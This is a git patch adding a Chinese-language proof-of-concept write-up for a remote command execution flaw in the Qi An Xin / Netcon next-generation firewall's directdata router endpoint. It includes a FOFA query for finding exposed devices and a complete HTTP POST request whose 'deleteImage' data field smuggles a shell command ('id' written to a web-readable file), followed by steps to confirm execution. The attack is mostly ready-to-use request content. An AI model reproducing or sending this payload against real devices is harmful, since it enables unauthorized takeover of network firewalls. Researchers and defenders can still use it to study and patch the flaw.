From 169412e3104432f1ca8956332a6eba5bbdf3dc7d Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 12 Jan 2024 12:23:35 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A5=87=E5=AE=89=E4=BF=A1=E7=BD=91?= =?UTF-8?q?=E5=BA=B7=E4=B8=8B=E4=B8=80=E4=BB=A3=E9=98=B2=E7=81=AB=E5=A2=99?= =?UTF-8?q?directdata=E5=AD=98=E5=9C=A8=E8=BF=9C=E7=A8=8B=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...下一代防火墙directdata存在远程命令执行漏洞.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md diff --git a/奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md b/奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md new file mode 100644 index 0000000..298ffed --- /dev/null +++ b/奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md @@ -0,0 +1,27 @@ +## 奇安信网康下一代防火墙directdata存在远程命令执行漏洞 + +奇安信网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙,存在远程命令执行,通过漏洞攻击者可以获取服务器权限。 + +## fofa +``` +app="网康下一代防火墙" +``` + +## poc +``` +POST /directdata/direct/router HTTP/1.1 +Host: +Connection: close +Content-Length: 160 +Upgrade-Insecure-Requests: 1 + +{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} +``` + +![5655f30db3f659f378796e6839e606ca](https://github.com/wy876/POC/assets/139549762/68a44096-0939-4fd7-971f-b73cde261000) + +然后访问https://xxxx.xxx/test.txt + +发现,命令已经成功执行 +![9e52fb8cbdc1cb4fcd479c2a56eb05c8](https://github.com/wy876/POC/assets/139549762/5227040a-13f1-4b7c-9d04-f22cbfd34404) +